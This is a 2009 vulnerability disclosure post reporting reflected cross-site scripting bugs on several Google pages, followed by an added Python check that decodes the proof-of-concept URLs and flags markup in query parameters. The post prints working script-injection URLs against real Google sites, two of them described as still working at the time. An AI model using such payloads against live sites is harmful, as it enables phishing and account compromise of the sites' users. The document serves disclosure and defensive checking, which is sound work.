Google SSL page vulnerable to XSS

Written by DP

Wednesday, 6 May 2009

A security researcher who goes by the nickname "Black-Hacker" has submitted to the archive a critical XSS vulnerability affecting a Google SSL page.

This bug can be exploited by malicious users to conduct phishing attacks against Google users and also to infect them with malware, adware and spyware.

Google XSSed:
https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22XSSed%22)%3C/script%3E=00000&hl=tr (still working at time of writing)

----------------------------------------------------------------------------

"HackSever" submitted another Google XSS on 20/04/2009:

http://books.google.com/books?q=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert(%27test%27)%3B%3C%2Fscript%3E&btnG=Kitaplar%C4%B1+Ara&hl=tr (now fixed)

----------------------------------------------------------------------------

Azat Harutyunyan is also credited for this discovery (still working at time of writing):

http://knol.google.com/k/knol/system/knol/pages/SearchToolkit?show=off&q=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

----------------------------------------------------------------------------

It is a matter of seconds before the Google Security Team fixes all of the above XSS vulns.
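As an added example (not part of the original post and not Google's code), the check below decodes the query string of each URL quoted above and reports whether markup characters arrive in a parameter name or in a parameter value. In the first URL the payload is the parameter name itself, which a filter that inspects only values never sees. The function names `scan_query` and `encode_for_html` are illustrative.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# The three proof-of-concept URLs quoted in this post, used as sample input.
POC_URLS = [
    "https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22XSSed%22)%3C/script%3E=00000&hl=tr",
    "http://books.google.com/books?q=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert(%27test%27)%3B%3C%2Fscript%3E&btnG=Kitaplar%C4%B1+Ara&hl=tr",
    "http://knol.google.com/k/knol/system/knol/pages/SearchToolkit?show=off&q=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E",
]

# Characters that let reflected text leave an HTML text or attribute context.
MARKUP_CHARS = set("<>\"'")


def scan_query(url):
    """Return (part, parameter_name, decoded_text) for each query component
    whose percent-decoded form contains markup characters.

    part is "name" or "value": a filter that inspects only values never sees
    a payload that is sent as the parameter name.
    """
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if MARKUP_CHARS & set(name):
            findings.append(("name", name, name))
        if MARKUP_CHARS & set(value):
            findings.append(("value", name, value))
    return findings


def encode_for_html(text):
    """Encode text for HTML body or quoted-attribute output.

    Text written inside a <script> block needs JavaScript string encoding
    instead; HTML entity encoding alone is not sufficient there.
    """
    return html.escape(text, quote=True)


if __name__ == "__main__":
    for url in POC_URLS:
        host = urlsplit(url).hostname
        for part, name, text in scan_query(url):
            print(f"{host}: markup in parameter {part}")
            print(f"  decoded: {text}")
            print(f"  encoded: {encode_for_html(text)}")
```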


        